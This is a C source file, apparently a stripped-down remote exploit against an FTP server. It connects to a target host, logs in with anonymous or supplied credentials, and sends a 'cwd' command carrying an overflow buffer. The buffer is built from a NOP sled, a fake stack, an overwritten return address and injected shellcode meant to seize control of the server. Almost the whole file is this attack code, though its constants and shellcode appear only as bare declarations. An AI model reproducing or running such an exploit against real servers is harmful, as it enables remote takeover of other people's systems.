
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {int s_addr; } ;
struct sockaddr_in {TYPE_1__ sin_addr; int sin_family; int sin_port; } ;
struct sockaddr {int dummy; } ;
struct hostent {int h_length; int h_addr; int h_addrtype; } ;
typedef int packetbuf ;
typedef int cli ;
typedef char* caddr_t ;


 int AF_INET ;
 int BUFSIZE ;
 int CODEOFS ;
 int EIP ;
 int FAKESTACK ;
 int FSTACKOFS ;
 int FTP_PORT ;
 char JMPOFS ;
 char JMPS ;
 int MAXPASS ;
 int MAXUSER ;
 int NOP ;
 size_t RETADR ;
 int SOCK_STREAM ;
 int bzero (struct sockaddr_in*,int) ;
 int close (int) ;
 int cmdbuf ;
 scalar_t__ connect (int,struct sockaddr*,int) ;
 int exit (int) ;
 int exploit_code ;
 struct hostent* gethostbyname (char*) ;
 int htons (int ) ;
 int inet_addr (char*) ;
 int memcpy (char*,int ,int ) ;
 int memset (char*,int ,int) ;
 int perror (char*) ;
 int printf (char*,...) ;
 int read (int,char*,int) ;
 int sendcmd (int,char*) ;
 int socket (int ,int ,int ) ;
 int sprintf (char*,char*,char*) ;
 int strcat (int ,int ) ;
 int * strchr (char*,char) ;
 int strcpy (char*,char*) ;
 int strlen (int ) ;
 int strncpy (char*,char*,int) ;

int main(int argc,char *argv[])
{
        struct hostent *hs;
        struct sockaddr_in cli;
        char packetbuf[BUFSIZE+3000],buf[BUFSIZE];
        char user[MAXUSER],pass[MAXPASS];
        int sockfd,i,fakestack,ip,ebp,ins;

        if (argc<2){
            printf("usage\n %s HostName {[username] [password]}\n",argv[0]);
            exit(1);
        }else if (argc==4){
            strncpy(user,argv[2],MAXUSER-1);
            strncpy(pass,argv[3],MAXPASS-1);
            user[MAXUSER-1]=0; pass[MAXPASS-1]=0;
        }else{
            strcpy(user,"anonymous");
            strcpy(pass,"hoge@hohoho.com");
        }
        bzero(&cli, sizeof(cli));
        cli.sin_family = AF_INET;
        cli.sin_port = htons(FTP_PORT);
        if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){
            if ((hs=gethostbyname(argv[1]))==((void*)0)){
                printf("Can not resolve specified host.\n");
                exit(1);
            }
            cli.sin_family = hs->h_addrtype;
            memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length);
        }

        if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
            perror("socket"); exit(0);
        }

        if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
            perror("connect"); exit(0);
        }
        while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
            packetbuf[i]=0;
            if(strchr(packetbuf,'\n')!=((void*)0)) break;
        }

        strcat(exploit_code,cmdbuf);
        memset(buf,NOP,BUFSIZE);

        fakestack=FAKESTACK;
        for (i=0;i<FSTACKOFS;i+=4){
            buf[i ]=fakestack&0xff;
            buf[i+1]=(fakestack>>8)&0xff;
            buf[i+2]=(fakestack>>16)&0xff;
            buf[i+3]=(fakestack>>24)&0xff;
        }
        ip=EIP;
        buf[RETADR ]=ip&0xff;
        buf[RETADR+1]=(ip>>8)&0xff;
        buf[RETADR+2]=(ip>>16)&0xff;
        buf[RETADR+3]=(ip>>24)&0xff;
        buf[RETADR+4]=JMPS;
        buf[RETADR+5]=JMPOFS;
        memcpy(buf+CODEOFS,exploit_code,strlen(exploit_code));
        buf[BUFSIZE]=0;

        sprintf(packetbuf,"user %s\r\n",user);
        sendcmd(sockfd,packetbuf);
        sprintf(packetbuf,"pass %s\r\n",pass);
        sendcmd(sockfd,packetbuf);
        sprintf(packetbuf,"cwd %s\r\n",buf);
        sendcmd(sockfd,packetbuf);

        close(sockfd);
}
